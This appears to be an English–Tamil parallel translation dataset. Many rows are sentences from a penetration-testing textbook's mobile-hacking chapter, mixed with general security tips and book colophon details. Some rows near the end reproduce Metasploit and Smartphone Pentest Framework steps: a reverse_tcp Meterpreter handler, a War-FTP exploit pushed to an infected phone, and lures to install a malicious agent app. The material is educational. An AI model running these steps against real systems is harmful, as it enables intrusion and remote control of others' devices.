en
stringlengths
4
3.31k
translation
stringlengths
5
3.49k
target_lang
stringclasses
10 values
domain
stringclasses
6 values
complexity
stringclasses
3 values
Mobile devices are now entering the workplace en masse.
மொபைல் சாதனங்கள் இப்போது பணியிடத்திற்குள் பெருமளவில் நுழைகின்றன.
ta
technical
simple
It falls to security teams and pentesters to evaluate the security risks of these devices.
இந்த சாதனங்களின் பாதுகாப்பு அபாயங்களை மதிப்பீடு செய்ய பாதுகாப்பு குழுக்களும், ஊடுருவல் சோதனையாளர்களும் உள்ளனர்.
ta
technical
moderate
Mobile technology is a rapidly developing field.
மொபைல் தொழில்நுட்பம் வேகமாக வளர்ந்து வரும் ஒரு துறையாகும்.
ta
technical
simple
Developing new mobile attacks and post-exploitation techniques is an ideal place to start with your own security research.
புதிய மொபைல் தாக்குதல்கள் மற்றும் சுரண்டலுக்குப் பிந்தைய நுட்பங்களை உருவாக்குவது உங்கள் சொந்த பாதுகாப்பு ஆராய்ச்சியைத் தொடங்க ஒரு சிறந்த இடமாகும்.
ta
technical
moderate
We’ll be discussing a tool I created to help pentesters to assess the security posture of mobile devices, the Smartphone Pentest Framework (SPF).
மொபைல் சாதனங்களின் பாதுகாப்பு நிலையை மதிப்பிடுவதற்கு ஊடுருவல் சோதனையாளர்களுக்கு உதவும் வகையில் நான் உருவாக்கிய ஒரு கருவி பற்றி விவாதிப்போம், அதாவது ஸ்மார்ட்போன் பென்டெஸ்ட் கட்டமைப்பு (SPF).
ta
technical
complex
After working your way through this book, you will be ready to embark on your own infosec journey.
இந்தப் புத்தகத்தின் மூலம் நீங்கள் பணியாற்றிய பிறகு, உங்கள் சொந்த தகவல் பாதுகாப்பு பயணத்தைத் தொடங்கத் தயாராக இருப்பீர்கள்.
ta
technical
moderate
For most of the examples in this chapter, we’ll use the Android platform as a target.
இந்த அத்தியாயத்தில் உள்ள பெரும்பாலான எடுத்துக்காட்டுகளுக்கு, நாங்கள் Android தளத்தை இலக்காகப் பயன்படுத்துவோம்.
ta
technical
simple
Mobile devices run operating systems, speak TCP/IP, and access a lot of the same resources that traditional computers do.
மொபைல் சாதனங்கள் இயக்க முறைமைகளை இயக்குகின்றன, TCP/IP பேசுகின்றன மற்றும் பாரம்பரிய கணினிகள் செய்யும் அதே வளங்களை அணுகுகின்றன.
ta
technical
moderate
They also have their own unique features that add new attack vectors and protocols to the mix.
அவை புதிய தாக்குதல் வெக்டர்கள் மற்றும் நெறிமுறைகளை கலவையில் சேர்க்கும் தனித்துவமான அம்சங்களையும் கொண்டுள்ளன.
ta
technical
moderate
Some features have been causing security problems on devices for years.
சில அம்சங்கள் பல ஆண்டுகளாக சாதனங்களில் பாதுகாப்பு சிக்கல்களை ஏற்படுத்தி வருகின்றன.
ta
technical
simple
SMS opens up a new social-engineering attack vector.
SMS ஒரு புதிய சமூக பொறியியல் தாக்குதல் வெக்டரைத் திறக்கிறது.
ta
technical
simple
SMS is an ideal vector for spam and phishing attacks.
SMS ஸ்பேம் மற்றும் ஃபிஷிங் தாக்குதல்களுக்கு ஒரு சிறந்த வெக்டராகும்.
ta
technical
simple
Security-awareness training will need to be augmented to include this threat.
இந்த அச்சுறுத்தலை உள்ளடக்குவதற்கு பாதுகாப்பு குறித்த விழிப்புணர்வு பயிற்சி அதிகரிக்கப்பட வேண்டும்.
ta
technical
moderate
A user who knows better than to click a random link in a suspicious-looking email may still click a random link in a text message.
சந்தேகத்திற்குரிய மின்னஞ்சலில் உள்ள ஒரு சீரற்ற இணைப்பைக் கிளிக் செய்வதை விட நன்றாகத் தெரிந்த ஒரு பயனர், இன்னும் ஒரு குறுஞ்செய்தியில் உள்ள சீரற்ற இணைப்பைக் கிளிக் செய்யலாம்.
ta
technical
complex
Mobile devices bring yet another attack vector to the table: near field communication, or NFC.
மொபைல் சாதனங்கள் மற்றொரு தாக்குதல் வெக்டரை அட்டவணையில் கொண்டு வருகின்றன: அருகாமை புல தொடர்பு, அல்லது NFC.
ta
technical
moderate
NFC allows devices to share data by touching or being near each other.
NFC சாதனங்கள் ஒன்றைய ஒன்று தொடுவதன் மூலம் அல்லது அருகில் இருப்பதன் மூலம் தரவைப் பகிர அனுமதிக்கிறது.
ta
technical
simple
NFC is another ideal social-engineering attack vector.
NFC மற்றொரு சிறந்த சமூக பொறியியல் தாக்குதல் வெக்டராகும்.
ta
technical
simple
QR codes can embed URLs, send data to an application on a mobile device, and so on.
QR குறியீடுகள் URLகளை உட்பொதிக்கலாம், மொபைல் சாதனத்தில் உள்ள ஒரு பயன்பாட்டிற்கு தரவை அனுப்பலாம், இன்னும் பல.
ta
technical
moderate
That QR code on a store window doesn’t have to point to the store’s website.
கடை ஜன்னலில் உள்ள QR குறியீடு கடையின் வலைத்தளத்திற்குச் சுட்டிக்காட்ட வேண்டியதில்லை.
ta
technical
simple
We will spend the rest of the chapter exploring SPF’s various options.
இந்த அத்தியாயத்தின் மீதமுள்ள பகுதியை SPF இன் பல்வேறு விருப்பங்களை ஆராய்வதில் செலவிடுவோம்.
ta
technical
simple
Various USSD tags offer all sorts of functionality.
பல்வேறு USSD குறிச்சொற்கள் பலவிதமான செயல்பாடுகளை வழங்குகின்றன.
ta
technical
moderate
Our example will use a more innocuous payload than the one described previously.
முன்னர் விவரிக்கப்பட்டதை விட, எங்கள் உதாரணம் மிகவும் பாதிப்பில்லாத பேலோடைப் பயன்படுத்தும்.
ta
technical
moderate
We’ll have our device automatically dial a code to present its unique identifier in a pop-up.
ஒரு பாப்-அப்பில் அதன் தனிப்பட்ட அடையாளங்காட்டியைக் காட்ட, எங்கள் சாதனம் தானாகவே ஒரு குறியீட்டை டயல் செய்யும்.
ta
technical
moderate
To run the safe USSD example in SPF, choose menu option 6, then 3.) USSD Webpage Attack (Safe) u.
SPF இல் பாதுகாப்பான USSD உதாரணத்தை இயக்க, மெனு விருப்பம் 6 ஐத் தேர்ந்தெடுத்து, பின்னர் 3.) USSD வலைப்பக்கத் தாக்குதல் (பாதுகாப்பானது) u.
ta
technical
moderate
You’ll be asked for the location of the web server, the name of the malicious page, and the phone number to text it to.
வலை சேவையகத்தின் இருப்பிடம், தீங்கிழைக்கும் பக்கத்தின் பெயர் மற்றும் அதற்கு உரை அனுப்ப வேண்டிய தொலைபேசி எண் ஆகியவற்றைக் கேட்கப்படுவீர்கள்.
ta
technical
moderate
This time, instead of crashing the browser, the dialer app opens, and a pop-up notification appears.
இந்த முறை, உலாவி செயலிழப்பதற்கு பதிலாக, டயலர் பயன்பாடு திறக்கிறது, மேலும் ஒரு பாப்-அப் அறிவிப்பு தோன்றும்.
ta
technical
moderate
As it turns out, our emulator has no unique identifier, so the number is blank.
எங்கள் எமுலேட்டருக்கு தனித்துவமான அடையாளங்காட்டி இல்லை, எனவே எண் காலியாக உள்ளது.
ta
technical
moderate
Though this example was not harmful to the device or its data, other USSD codes can be if they are opened in the dialer.
இந்த உதாரணம் சாதனம் அல்லது அதன் தரவுக்கு தீங்கு விளைவிக்கவில்லை என்றாலும், மற்ற USSD குறியீடுகள் டயலரில் திறக்கப்பட்டால் தீங்கு விளைவிக்கும்.
ta
technical
moderate
Android has a complicated relationship with security updates.
Android பாதுகாப்பு புதுப்பிப்புகளுடன் சிக்கலான உறவைக் கொண்டுள்ளது.
ta
technical
moderate
The problem is that anyone can make an Android device with its own implementation of the Android OS.
பிரச்சனை என்னவென்றால், எவரும் Android OS இன் சொந்த அமலாக்கத்துடன் Android சாதனத்தை உருவாக்க முடியும்.
ta
technical
moderate
When Google releases a new version with a set of patches, every original equipment manufacturer (OEM) needs to port the changes to its version of Android, and the carriers need to push updates to their devices.
Google ஒரு புதிய பதிப்பை பேட்ச் தொகுப்புடன் வெளியிடும்போது, ​​ஒவ்வொரு அசல் உபகரண உற்பத்தியாளரும் (OEM) மாற்றங்களை அதன் Android பதிப்பிற்கு மாற்ற வேண்டும், மேலும் கேரியர்கள் தங்கள் சாதனங்களுக்கு புதுப்பிப்புகளை அனுப்ப வேண்டும்.
ta
technical
complex
However, updates are not delivered consistently, which means that millions of unpatched devices may be in use, depending on the model and the carrier.
இருப்பினும், புதுப்பிப்புகள் தொடர்ந்து வழங்கப்படுவதில்லை, அதாவது மாதிரி மற்றும் கேரியரைப் பொறுத்து, மில்லியன் கணக்கான பேட்ச் செய்யப்படாத சாதனங்கள் பயன்பாட்டில் இருக்கலாம்.
ta
technical
complex
Now let’s turn our attention to a vulnerability that will probably never be patched: malicious applications.
இப்போது, ​​ஒருபோதும் பேட்ச் செய்யப்படாத ஒரு பாதிப்புக்கு நமது கவனத்தைத் திருப்புவோம்: தீங்கிழைக்கும் பயன்பாடுகள்.
ta
technical
moderate
We created malicious executables with Msfvenom in Chapter 4, uploaded back- doors to vulnerable web servers in Chapter 8, looked at social-engineering attacks to trick users into downloading and running malicious programs in Chapter 11, and bypassed antivirus programs in Chapter 12.
நாம் 4 ஆம் அதிகாரத்தில் Msfvenom உடன் தீங்கிழைக்கும் செயல்படுத்தக்கூடியவற்றை உருவாக்கினோம், 8 ஆம் அதிகாரத்தில் பாதிக்கப்படக்கூடிய வலை சேவையகங்களுக்குப் பின் கதவுகளைப் பதிவேற்றினோம், 11 ஆம் அதிகாரத்தில் தீங்கிழைக்கும் நிரல்களைப் பதிவிறக்கம் செய்து இயக்குவதற்கு பயனர்களை ஏமாற்ற சமூகப் பொறியியல் தாக்குதல்களைப் பார்த்தோம், மேலும் 12 ஆம் அதிகாரத்தில் வைரஸ் தடுப்பு நிரல்களைத் தவிர்த்தோம்.
ta
technical
complex
Mobile users are inundated with reasons to download apps to their devices, and mobile malware is on the rise, much of it in the form of mali- cious applications.
மொபைல் பயனர்கள் தங்கள் சாதனங்களில் பயன்பாடுகளைப் பதிவிறக்குவதற்கான காரணங்களால் நிரம்பி வழிகிறார்கள், மேலும் மொபைல் தீம்பொருள் அதிகரித்து வருகிறது, அதில் பெரும்பாலானவை தீங்கிழைக்கும் பயன்பாடுகளின் வடிவத்தில் உள்ளன.
ta
technical
moderate
If a user can be tricked into installing a malicious app, the attacker can utilize Android’s APIs to steal data, gain remote control, and even attack other devices.
ஒரு பயனர் தீங்கிழைக்கும் பயன்பாட்டை நிறுவ ஏமாற்றப்பட்டால், தாக்குபவர் தரவை திருட, தொலைநிலை கட்டுப்பாட்டைப் பெற மற்றும் பிற சாதனங்களைத் தாக்க Android இன் APIகளைப் பயன்படுத்தலாம்.
ta
technical
complex
In the Android security model, apps must request permissions to use APIs that could be used maliciously, and users must accept the requested permissions at installation.
Android பாதுகாப்பு மாதிரியில், தீங்கிழைக்கும் வகையில் பயன்படுத்தக்கூடிய APIகளைப் பயன்படுத்த பயன்பாடுகள் அனுமதிகளைக் கோர வேண்டும், மேலும் பயனர்கள் நிறுவலில் கோரப்பட்ட அனுமதிகளை ஏற்க வேண்டும்.
ta
technical
complex
We can use Android permis- sions to control the device without running an additional exploit after the user installs the malicious app.
தீங்கிழைக்கும் பயன்பாட்டை பயனர் நிறுவிய பின், கூடுதல் சுரண்டலை இயக்காமல் சாதனத்தை கட்டுப்படுத்த Android அனுமதிகளைப் பயன்படுத்தலாம்.
ta
technical
moderate
SPF allows us to create a malicious app with a variety of interesting func- tionality.
SPF ஆனது பல்வேறு சுவாரஸ்யமான செயல்பாடுகளுடன் ஒரு தீங்கிழைக்கும் பயன்பாட்டை உருவாக்க அனுமதிக்கிறது.
ta
technical
moderate
Earlier we used the SPF app on our pentester-controlled device to allow SPF to use the device’s mobile modem and other functionality; our goal here is to trick users into installing the SPF agent on target devices.
முன்பு, சாதனத்தின் மொபைல் மோடம் மற்றும் பிற செயல்பாடுகளைப் பயன்படுத்த SPF ஐ அனுமதிப்பதற்காக, எங்கள் பென்டெஸ்டர்-கட்டுப்படுத்தப்பட்ட சாதனத்தில் SPF பயன்பாட்டைப் பயன்படுத்தினோம்; இங்கு எங்கள் குறிக்கோள் என்னவென்றால், இலக்கு சாதனங்களில் SPF முகவரை நிறுவ பயனர்களை ஏமாற்றுவதாகும்.
ta
technical
complex
The company's network was vulnerable to several attacks.
நிறுவனத்தின் நெட்வொர்க் பல தாக்குதல்களுக்கு ஆளாகக்கூடியதாக இருந்தது.
ta
technical
moderate
Install the latest security patches to protect your system.
உங்கள் கணினியைப் பாதுகாக்க சமீபத்திய பாதுகாப்பு இணைப்புகளை நிறுவவும்.
ta
technical
simple
Penetration testing helps identify weaknesses in a system.
ஊடுருவல் சோதனை ஒரு கணினியில் உள்ள பலவீனங்களை அடையாளம் காண உதவுகிறது.
ta
technical
moderate
A firewall is essential for network security.
ஒரு ஃபயர்வாள் நெட்வொர்க் பாதுகாப்பிற்கு அவசியமானது.
ta
technical
simple
Regularly back up your data to prevent data loss.
தரவு இழப்பைத் தடுக்க, உங்கள் தரவை தவறாமல் காப்புப்பிரதி எடுக்கவும்.
ta
general
simple
The hacker exploited a vulnerability in the web server.
ஹேக்கர் வலை சேவையகத்தில் உள்ள ஒரு பாதிப்பைப் பயன்படுத்திக் கொண்டார்.
ta
technical
moderate
Strong passwords are the first line of defense against cyberattacks.
வலுவான கடவுச்சொற்கள் சைபர் தாக்குதல்களுக்கு எதிரான முதல் பாதுகாப்பு வரிசையாகும்.
ta
general
simple
Social engineering is a common tactic used by attackers.
சமூக பொறியியல் என்பது தாக்குபவர்களால் பயன்படுத்தப்படும் ஒரு பொதுவான தந்திரோபாயமாகும்.
ta
technical
moderate
The security audit revealed several critical flaws.
பாதுகாப்பு தணிக்கை பல முக்கியமான குறைபாடுகளை வெளிப்படுத்தியது.
ta
technical
moderate
Always keep your software updated to patch security holes.
பாதுகாப்பு ஓட்டைகளை சரிசெய்ய உங்கள் மென்பொருளை எப்போதும் புதுப்பித்த நிலையில் வைத்திருங்கள்.
ta
technical
simple
The attacker used a phishing email to steal credentials.
கடவுச்சொற்களைத் திருட தாக்குபவர் ஒரு ஃபிஷிங் மின்னஞ்சலைப் பயன்படுத்தினார்.
ta
technical
moderate
Network segmentation can limit the impact of a breach.
நெட்வொர்க் பிரிப்பு ஒரு மீறலின் தாக்கத்தை கட்டுப்படுத்த முடியும்.
ta
technical
moderate
Encryption protects sensitive data from unauthorized access.
அங்கீகரிக்கப்படாத அணுகலில் இருந்து முக்கியமான தரவைப் பாதுகாக்கிறது.
ta
technical
simple
The company implemented multi-factor authentication for added security.
நிறுவனம் கூடுதல் பாதுகாப்பிற்காக பல காரணி அங்கீகாரத்தை செயல்படுத்தியது.
ta
technical
moderate
A denial-of-service attack can disrupt online services.
சேவை மறுப்பு தாக்குதல் ஆன்லைன் சேவைகளை சீர்குலைக்கும்.
ta
technical
moderate
The security team conducted a thorough risk assessment.
பாதுகாப்பு குழு ஒரு முழுமையான இடர் மதிப்பீட்டை நடத்தியது.
ta
technical
moderate
Regular vulnerability scanning is crucial for maintaining security.
பாதுகாப்பை பராமரிக்க வழக்கமான பாதிப்பு ஸ்கேனிங் முக்கியமானது.
ta
technical
moderate
The incident response plan was activated after the breach.
மீறலுக்குப் பிறகு சம்பவ பதில் திட்டம் செயல்படுத்தப்பட்டது.
ta
technical
moderate
Educate employees about phishing and social engineering tactics.
ஃபிஷிங் மற்றும் சமூக பொறியியல் தந்திரோபாயங்கள் பற்றி ஊழியர்களுக்கு பயிற்சி அளிக்கவும்.
ta
general
moderate
The security of the system depends on multiple layers of defense.
கணினியின் பாதுகாப்பு பல பாதுகாப்பு அடுக்குகளைப் பொறுத்தது.
ta
technical
complex
Nessus detection of vulnerabilities is discussed in chapter 139.
139-வது அத்தியாயத்தில் பாதிப்புகளைக் கண்டறிவதற்கான நெசஸ் பற்றிய தகவல் விவரிக்கப்பட்டுள்ளது.
ta
technical
moderate
The book discusses wireless attacks on pages 339–357.
இந்தப் புத்தகம் 339–357 பக்கங்களில் வயர்லெஸ் தாக்குதல்களைப் பற்றி விவாதிக்கிறது.
ta
technical
simple
Wireshark is used for capturing and dissecting network traffic.
வைரஷர்க் நெட்வொர்க் போக்குவரத்தை கைப்பற்றவும், பகுப்பாய்வு செய்யவும் பயன்படுகிறது.
ta
technical
moderate
The book provides information on WPA2 cracking keys.
இந்தப் புத்தகம் WPA2 குறியீடுகளை உடைப்பது பற்றிய தகவல்களை வழங்குகிறது.
ta
technical
moderate
XAMPP's default install location is mentioned on page 186.
XAMPP-ன் இயல்புநிலை நிறுவல் இருப்பிடம் 186-வது பக்கத்தில் குறிப்பிடப்பட்டுள்ளது.
ta
technical
simple
The book covers XSS (cross-site scripting) vulnerabilities.
இந்தப் புத்தகம் XSS (கிராஸ்-சைட் ஸ்கிரிப்டிங்) பாதிப்புகளைப் பற்றி உள்ளடக்கியுள்ளது.
ta
technical
moderate
The book is printed and bound by Sheridan Books, Inc.
இந்தப் புத்தகம் ஷெரிடன் புக்ஸ், இன்க். மூலம் அச்சிடப்பட்டு பிணைக்கப்பட்டுள்ளது.
ta
general
simple
Visit http://nostarch.com/pentesting/ for updates.
புதுப்பிப்புகளுக்கு http://nostarch.com/pentesting/ ஐப் பார்வையிடவும்.
ta
general
simple
The book is certified by the Forest Stewardship Council (FSC).
இந்தப் புத்தகம் வன மேலாண்மை கவுன்சிலால் (FSC) சான்றளிக்கப்பட்டது.
ta
general
simple
The paper used is 60# Finch Offset.
பயன்படுத்தப்பட்ட காகிதம் 60# பின்ச் ஆஃப்செட் ஆகும்.
ta
general
simple
The book uses a layflat binding.
இந்தப் புத்தகம் ஒரு லேஃப்ளாட் பைண்டிங்கைப் பயன்படுத்துகிறது.
ta
general
simple
You can find 7-Zip programs for Windows and Linux platforms.
விண்டோஸ் மற்றும் லினக்ஸ் தளங்களுக்கான 7-Zip நிரல்களை நீங்கள் காணலாம்.
ta
technical
simple
Mac users can use Ez7z.
மேக் பயனர்கள் Ez7z ஐப் பயன்படுத்தலாம்.
ta
technical
simple
If you’re unable to download the files, we’ll send you a DVD.
நீங்கள் கோப்புகளைப் பதிவிறக்க முடியாவிட்டால், நாங்கள் உங்களுக்கு ஒரு DVD அனுப்புவோம்.
ta
general
moderate
Additional resources are available at Georgia Weidman’s website.
கூடுதல் ஆதாரங்கள் ஜார்ஜியா வைட்மேனின் இணையதளத்தில் கிடைக்கின்றன.
ta
general
simple
The book covers topics related to penetration testing.
இந்தப் புத்தகம் ஊடுருவல் சோதனை தொடர்பான தலைப்புகளை உள்ளடக்கியது.
ta
technical
simple
The book provides a hands-on introduction to hacking.
இந்தப் புத்தகம் ஹேக்கிங்கைப் பற்றிய கையேடு அறிமுகத்தை வழங்குகிறது.
ta
technical
simple
The book discusses local privilege escalation.
இந்தப் புத்தகம் உள்ளூர் சலுகை விரிவாக்கம் பற்றி விவாதிக்கிறது.
ta
technical
moderate
The book explains how to set up to behave as a member of a Windows domain.
விண்டோஸ் டொமைனின் உறுப்பினராக எவ்வாறு செயல்படுவது என்பதைப் புத்தகம் விளக்குகிறது.
ta
technical
complex
The book provides information on the windows/local/bypassuac exploit.
விண்டோஸ்/லோக்கல்/பைபாஸ்யுஏசி சுரண்டல் பற்றிய தகவல்களை இந்தப் புத்தகம் வழங்குகிறது.
ta
technical
moderate
We can do the same thing for Android as long as we have an ARM cross compiler.
ARM குறுக்கு கம்பைலரை வைத்திருந்தால், ஆண்ட்ராய்டுக்கும் இதே வேலையைச் செய்யலாம்.
ta
technical
moderate
Luckily, SPF has one. As shown in Listing 20-23, choose option 9.) Compile code to run on mobile devices from the main menu.
அதிர்ஷ்டவசமாக, SPF ஒன்றைக் கொண்டுள்ளது. பட்டியல் 20-23 இல் காட்டப்பட்டுள்ளபடி, பிரதான மெனுவில் இருந்து மொபைல் சாதனங்களில் இயக்க குறியீட்டைத் தொகுக்க, விருப்பம் 9) ஐத் தேர்ந்தெடுக்கவும்.
ta
technical
moderate
Compile code to run on mobile devices 1.) Compile C code for ARM Android spf> 1u Compiles C code to run on ARM based Android devices.
மொபைல் சாதனங்களில் இயக்க குறியீட்டைத் தொகுக்கவும் 1.) ARM Android-க்காக C குறியீட்டைத் தொகுக்கவும் spf> 1u ARM அடிப்படையிலான Android சாதனங்களில் இயக்க C குறியீட்டைத் தொகுக்கிறது.
ta
technical
moderate
Supply the C code file and the output filename File to Compile: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter.cv Output File: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter
C குறியீடு கோப்பையும், வெளியீட்டு கோப்பு பெயரையும் வழங்கவும். தொகுக்க வேண்டிய கோப்பு: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter.cv வெளியீட்டு கோப்பு: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter
ta
technical
complex
Select 1.) Compile C code for ARM Android u. You will be prompted for the C file to compile as well as where you want to put the compiled binary v.
1.) ARM Android-க்காக C குறியீட்டைத் தொகுக்கவும் u. தொகுக்க வேண்டிய C கோப்பு மற்றும் தொகுக்கப்பட்ட பைனரியை எங்கு வைக்க வேண்டும் v என்பதைக் கேட்கப்படுவீர்கள்.
ta
technical
moderate
Now we need to download the War-FTP exploit to our infected Android device.
இப்போது, ​​எங்கள் பாதிக்கப்பட்ட Android சாதனத்தில் War-FTP சுரண்டலை பதிவிறக்கம் செய்ய வேண்டும்.
ta
technical
moderate
From the agent commands menu, choose option 6 to download a file.
ஏஜென்ட் கட்டளைகள் மெனுவிலிருந்து, ஒரு கோப்பை பதிவிறக்கம் செய்ய விருப்பம் 6 ஐத் தேர்ந்தெடுக்கவும்.
ta
technical
simple
You will be asked for the file to download and the delivery method, as shown in Listing 20-24.
பட்டியல் 20-24 இல் காட்டப்பட்டுள்ளபடி, பதிவிறக்கம் செய்ய வேண்டிய கோப்பு மற்றும் டெலிவரி முறை கேட்கப்படும்.
ta
technical
moderate
Select a command to perform or 0 to return to the previous menu spf> 6 Downloads a file to the phone.
செய்ய வேண்டிய கட்டளையைத் தேர்ந்தெடுக்கவும் அல்லது முந்தைய மெனுவிற்குச் செல்ல 0 ஐ அழுத்தவும் spf> 6 தொலைபேசியில் ஒரு கோப்பை பதிவிறக்குகிறது.
ta
technical
simple
Fill in the file and the delivery method(SMS or HTTP). File to download: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter Delivery Method(SMS or HTTP): HTTP
கோப்பை நிரப்பவும் மற்றும் டெலிவரி முறையை(SMS அல்லது HTTP) உள்ளிடவும். பதிவிறக்கம் செய்ய வேண்டிய கோப்பு: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter டெலிவரி முறை(SMS அல்லது HTTP): HTTP
ta
technical
moderate
Before we run the exploit, we need to set up a handler in Msfconsole, as shown in Listing 20-25.
சுரண்டலை இயக்குவதற்கு முன், பட்டியல் 20-25 இல் காட்டப்பட்டுள்ளபடி, Msfconsole இல் ஒரு ஹேண்ட்லரை அமைக்க வேண்டும்.
ta
technical
moderate
Open Msfconsole on Kali, and use the multi/ handler module, setting the options to match the payload in the War-FTP exploit.
காலி-யில் Msfconsole ஐத் திறந்து, multi/handler தொகுதியைப் பயன்படுத்தவும், War-FTP சுரண்டலில் உள்ள பேலோடுக்கு பொருந்தும் விருப்பங்களை அமைக்கவும்.
ta
technical
moderate
msf > use multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp
msf > multi/handler ஐப் பயன்படுத்துக msf exploit(handler) > பேலோடை அமைக்கவும் windows/meterpreter/reverse_tcp பேலோடு => windows/meterpreter/reverse_tcp
ta
technical
complex
msf exploit(handler) > set LHOST 192.168.20.9 LHOST => 192.168.20.9 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.20.9:4444 [*] Starting the payload handler...
msf exploit(handler) > LHOST 192.168.20.9 ஐ அமைக்கவும் LHOST => 192.168.20.9 msf exploit(handler) > சுரண்டல் [*] 192.168.20.9:4444 இல் தலைகீழ் ஹேண்ட்லர் தொடங்கப்பட்டது [*] பேலோட் ஹேண்ட்லரைத் தொடங்குகிறது...
ta
technical
complex
Finally, it’s time to run the exploit. As shown in Listing 20-26, choose option 7.) Execute Command from the agent commands menu; you will be prompted for the command to run.
இறுதியாக, சுரண்டலை இயக்குவதற்கான நேரம் இது. பட்டியல் 20-26 இல் காட்டப்பட்டுள்ளபடி, விருப்பம் 7) ஐத் தேர்ந்தெடுக்கவும். ஏஜென்ட் கட்டளைகள் மெனுவிலிருந்து கட்டளையை இயக்கு; இயக்க வேண்டிய கட்டளை கேட்கப்படும்.
ta
technical
moderate
Select a command to perform or 0 to return to the previous menu spf> 7 Run a command in the terminal.
செய்ய வேண்டிய கட்டளையைத் தேர்ந்தெடுக்கவும் அல்லது முந்தைய மெனுவிற்குச் செல்ல 0 ஐ அழுத்தவும் spf> 7 முனையத்தில் ஒரு கட்டளையை இயக்கவும்.
ta
technical
simple
Fill in the command and the delivery method(SMS or HTTP). Command: warftpmeterpreter 192.168.20.10 21u Downloaded?: yesv Delivery Method(SMS or HTTP): HTTP
கட்டளையையும் டெலிவரி முறையையும்(SMS அல்லது HTTP) நிரப்பவும். கட்டளை: warftpmeterpreter 192.168.20.10 21u பதிவிறக்கம் செய்யப்பட்டதா?: ஆம்v டெலிவரி முறை(SMS அல்லது HTTP): HTTP
ta
technical
moderate
Tell SPF the full command, including arguments u. In this case, we need to tell the exploit the IP address and port to attack.
SPF க்கு முழு கட்டளையையும், வாதங்கள் உட்பட u ஐக் கூறுங்கள். இந்த விஷயத்தில், தாக்குவதற்கு IP முகவரி மற்றும் போர்ட்டை சுரண்டலுக்குச் சொல்ல வேண்டும்.
ta
technical
moderate
SPF asks if the binary was downloaded. If it was downloaded through SPF, it will be in the agent’s files directory, and SPF will need to know to run it from there.
பைனரி பதிவிறக்கம் செய்யப்பட்டதா என்று SPF கேட்கிறது. இது SPF மூலம் பதிவிறக்கம் செய்யப்பட்டால், அது ஏஜென்ட்டின் கோப்புகள் கோப்பகத்தில் இருக்கும், மேலும் அங்கிருந்து அதை இயக்க SPF க்குத் தெரிய வேண்டும்.
ta
technical
moderate
In our case, we answer yes v, then enter the delivery method as usual. Watch your Metasploit listener. In about a minute you should receive a Meterpreter prompt like the one shown next.
எங்கள் விஷயத்தில், நாங்கள் ஆம் v என்று பதிலளிக்கிறோம், பின்னர் வழக்கம்போல் டெலிவரி முறையை உள்ளிடுகிறோம். உங்கள் Metasploit கேட்பவரைப் பாருங்கள். சுமார் ஒரு நிமிடத்தில் அடுத்ததாகக் காட்டப்பட்டுள்ளதைப் போன்ற ஒரு Meterpreter வரியில் பெற வேண்டும்.
ta
technical
moderate